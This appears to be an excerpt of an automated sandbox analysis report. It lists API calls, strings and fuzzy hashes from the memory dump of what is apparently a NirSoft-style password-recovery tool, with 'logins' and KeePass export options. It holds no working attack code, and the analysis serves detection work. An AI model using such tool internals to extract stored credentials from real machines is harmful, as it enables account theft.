                                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                                  • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                                                                                                                                • String ID: logins$null
                                                                                                                                                                • API String ID: 3492182834-2163367763
                                                                                                                                                                • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                                                                • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                                                                • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                • memset.MSVCRT ref: 004085CF
                                                                                                                                                                • memset.MSVCRT ref: 004085F1
                                                                                                                                                                • memset.MSVCRT ref: 00408606
                                                                                                                                                                • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                • _mbscpy.MSVCRT ref: 004086DB
                                                                                                                                                                • _mbscpy.MSVCRT ref: 004086FA
                                                                                                                                                                • memset.MSVCRT ref: 0040870E
                                                                                                                                                                • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                • String ID: ---
                                                                                                                                                                • API String ID: 3437578500-2854292027
                                                                                                                                                                • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                                                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                                                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0041087D
                                                                                                                                                                • memset.MSVCRT ref: 00410892
                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1010922700-0
                                                                                                                                                                • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                                                                • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                                                                • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                                                                                                                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$FullNamePath$malloc$Version
                                                                                                                                                                • String ID: |A
                                                                                                                                                                • API String ID: 4233704886-1717621600
                                                                                                                                                                • Opcode ID: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                • Opcode Fuzzy Hash: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                • API String ID: 2081463915-1959339147
                                                                                                                                                                • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                                                                • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                                                                • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                • API String ID: 2012295524-70141382
                                                                                                                                                                • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                • API String ID: 667068680-3953557276
                                                                                                                                                                • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                • memcpy.MSVCRT ref: 0041234D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1700100422-0
                                                                                                                                                                • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                                                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                                                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 552707033-0
                                                                                                                                                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                                                                                                                • memcpy.MSVCRT ref: 0040C11B
                                                                                                                                                                • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                • String ID: 4$h
                                                                                                                                                                • API String ID: 4066021378-1856150674
                                                                                                                                                                • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                                                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                                                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$_snwprintf
                                                                                                                                                                • String ID: %%0.%df
                                                                                                                                                                • API String ID: 3473751417-763548558
                                                                                                                                                                • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                                                                • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                                                                • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                • String ID: A
                                                                                                                                                                • API String ID: 2892645895-3554254475
                                                                                                                                                                • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                • String ID: caption
                                                                                                                                                                • API String ID: 973020956-4135340389
                                                                                                                                                                • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                                                                • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                                                                • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
